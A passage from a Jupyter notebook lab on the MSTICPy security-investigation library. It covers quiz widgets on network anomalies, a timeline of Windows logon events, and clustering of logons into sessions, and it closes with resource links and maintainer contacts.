Using the timeline above answer the following questions:

<details>
    <summary>Hint:</summary>
    <ul>
        <li>Hover over points on the timeline to see additional information</li>
    </ul>
</details>
</div>

In [None]:
import ipywidgets as widgets
md("On what date did the two network data anomalies occur?", "bold")
date = widgets.DatePicker(
    description='Pick a Date',
    disabled=False
)
display(date)

md("How many bytes were sent at 2020-07-06 19:00?", "bold")
bytesa = widgets.Text(
    description='Answer:',
    disabled=False
)
display(bytesa)

In [None]:
if str(date.value) == answers['question1'] and bytesa.value ==  answers['question2']:
    md(f"Correct, the anomalies occurred on {date.value} and {bytesa.value} bytes were transferred at 2020-07-06 19:00")
else:
    md("One of your answers is incorrect please try again")

### Logon Sessions
Logon events are key to understanding any host based activity. We have previously used MSTICPy's [timeline feature](https://msticpy.readthedocs.io/en/latest/visualization/EventTimeline.html) to display value based data from our timeseries analysis. However, we can also use it to display multiple types of discrete data on the same timeline. This is particularly useful for Windows logon events where we plot different logon types (interactive, network, etc.) in different horizontal series.<br>
We can split the plot by simply providing it a column to split on, with the parameter `group_by`.

In [None]:
# Acquire data using a built in query
host_logons = qry_prov.WindowsSecurity.list_host_logons()

# Display timeline
tooltip_cols = ["TimeGenerated", "Account", "LogonType"]
nbdisplay.display_timeline(data=host_logons, title="Host Logons", source_columns = tooltip_cols, group_by = "LogonType", height=200)

When presented with a large number of events such as we have here it's useful to cluster these into a more manageable number of groups. MSTICpy contains [clustering features](https://msticpy.readthedocs.io/en/latest/msticpy.sectools.html?highlight=cluster_events#msticpy.sectools.eventcluster.dbcluster_events) that can be used against a number of data types. Once clustering is complete we use another [widget](https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html?highlight=SelectItem#msticpy.nbtools.nbwidgets.SelectItem) to let the user select the cluster they want to focus on.

In [None]:
from msticpy.analysis.eventcluster import dbcluster_events, add_process_features, _string_score

# Get data and convert some values into numericals
logon_features = host_logons.copy()
logon_features["AccountNum"] = host_logons.apply(lambda x: _string_score(x.Account), axis=1)
logon_features["TargetUserNum"] = host_logons.apply(lambda x: _string_score(x.TargetUserName), axis=1)
logon_features["LogonHour"] = host_logons.apply(lambda x: x.TimeGenerated.hour, axis=1)

# run clustering
(clus_logons, _, _) = dbcluster_events(data=logon_features, time_column="TimeGenerated", cluster_columns=["AccountNum", "LogonType", "TargetUserNum"], max_cluster_distance=0.0001)

# Sort and format the clustering scores to group similar logon events into sessions
dist_logons = clus_logons.sort_values("TimeGenerated")[["TargetUserName", "TimeGenerated", "LastEventTime", "LogonType", "ClusterSize"]]
dist_logons = dist_logons.apply(lambda x: (
        f"{x.TargetUserName}:    "
        f"(logontype {x.LogonType})   "
        f"timerange: {x.TimeGenerated} - {x.LastEventTime}    "
        f"count: {x.ClusterSize}"
    ),
    axis=1,
)
# Extract the distinct sessions
dist_logons = {v: k for k, v in dist_logons.to_dict().items()}

def show_logon(idx):
    return nbdisplay.format_logon(pd.DataFrame(clus_logons.loc[idx]).T)

# Display the sessions in a selection widget for later use
logon_wgt = nbwidgets.SelectItem(description="Select logon cluster to examine", item_dict=dist_logons, action=show_logon,height="200px", width="100%", auto_display=True)
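
The goal of the clustering step, collapsing many similar logon events into a handful of sessions with a time range and a count, can be illustrated with a far simpler technique: exact-match grouping on a set of key columns. This is not DBSCAN and not what `dbcluster_events` does internally; the `summarise_sessions` helper and the sample records are hypothetical.

```python
from datetime import datetime
from typing import Dict, List, Tuple


def summarise_sessions(
    events: List[dict], keys: List[str], time_column: str = "TimeGenerated"
) -> List[dict]:
    """Group events that share the same key values and summarise each group."""
    clusters: Dict[Tuple, dict] = {}
    for event in sorted(events, key=lambda e: e[time_column]):
        key = tuple(event[k] for k in keys)
        if key not in clusters:
            clusters[key] = {
                **{k: event[k] for k in keys},
                "FirstEventTime": event[time_column],
                "LastEventTime": event[time_column],
                "ClusterSize": 0,
            }
        cluster = clusters[key]
        cluster["LastEventTime"] = event[time_column]  # events arrive in time order
        cluster["ClusterSize"] += 1
    return list(clusters.values())


sample_logons = [
    {"Account": "alice", "LogonType": 3, "TimeGenerated": datetime(2021, 1, 1, 9, 0)},
    {"Account": "alice", "LogonType": 3, "TimeGenerated": datetime(2021, 1, 1, 9, 5)},
    {"Account": "bob", "LogonType": 10, "TimeGenerated": datetime(2021, 1, 1, 9, 2)},
]
sessions = summarise_sessions(sample_logons, keys=["Account", "LogonType"])
```

Distance-based clustering goes further than this by also grouping events whose features are close but not identical, which is why the cell above first converts account names into numeric scores.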

---

<h1 style="border: 1px solid;background-color: LightGray; padding: 10px">Summary</h1>

MSTICPy has many features, and in this lab you have only just started to scratch the surface. There are many more to explore.<br>
In addition MSTICPy is a work in progress and we are very open to contributions, improvements, feedback, and feature requests from the community.

<h1 style="border: 1px solid;background-color: LightGray; padding: 10px">Check out our Microsoft Learn TV session</h1>

Check out our one-hour live broadcast on Microsoft Learn TV on **May 20 at 1PM PT**,
where we’ll dive deep into MSTICPy and its many uses! Special focus on extending MSTICPy.

More details and save-the-date at https://aka.ms/thelaunchspacemsticpy.

---

<h1 style="border: 1px solid;background-color: LightGray; padding: 10px">Resources</h1>

MSTICPy Documentation - https://msticpy.readthedocs.io<br>
GitHub repo - https://github.com/microsoft/msticpy<br>
Blog - https://msticpy.medium.com<br>

Sample notebooks:
- https://github.com/microsoft/msticpy/tree/master/docs/notebooks
- https://github.com/Azure/Azure-Sentinel-Notebooks


<h1 style="border: 1px solid;background-color: LightGray; padding: 10px">Contacts</h1>

MSTICPy is built and maintained by:
<ul>
    <li>Ian Hellen</li>
    <li>Pete Bryan</li>
    <li>Ashwin Patil</li>
</ul>

If you have any questions please reach out to us on [GitHub](https://github.com/microsoft/msticpy) or at:<br>
Email - msticpy@microsoft.com<br>
Twitter - [@ianhellen (Ian Hellen)](https://twitter.com/ianhellen), [@MSSPete (Pete Bryan)](https://twitter.com/MSSPete), [@AshwinPatil (Ashwin Patil)](https://twitter.com/ashwinpatil)<br>
GitHub - [@ianhelle](https://github.com/ianhelle), [@PeteBryan](https://github.com/petebryan), [@Ashwin-Patil](https://github.com/ashwin-patil)<br>
LinkedIn - [@ianhellen](https://www.linkedin.com/in/ianhellen/), [@PeteBryan](https://www.linkedin.com/in/peter-bryan-77588473/), [@AshwinPatil](https://www.linkedin.com/in/ashwinrp/)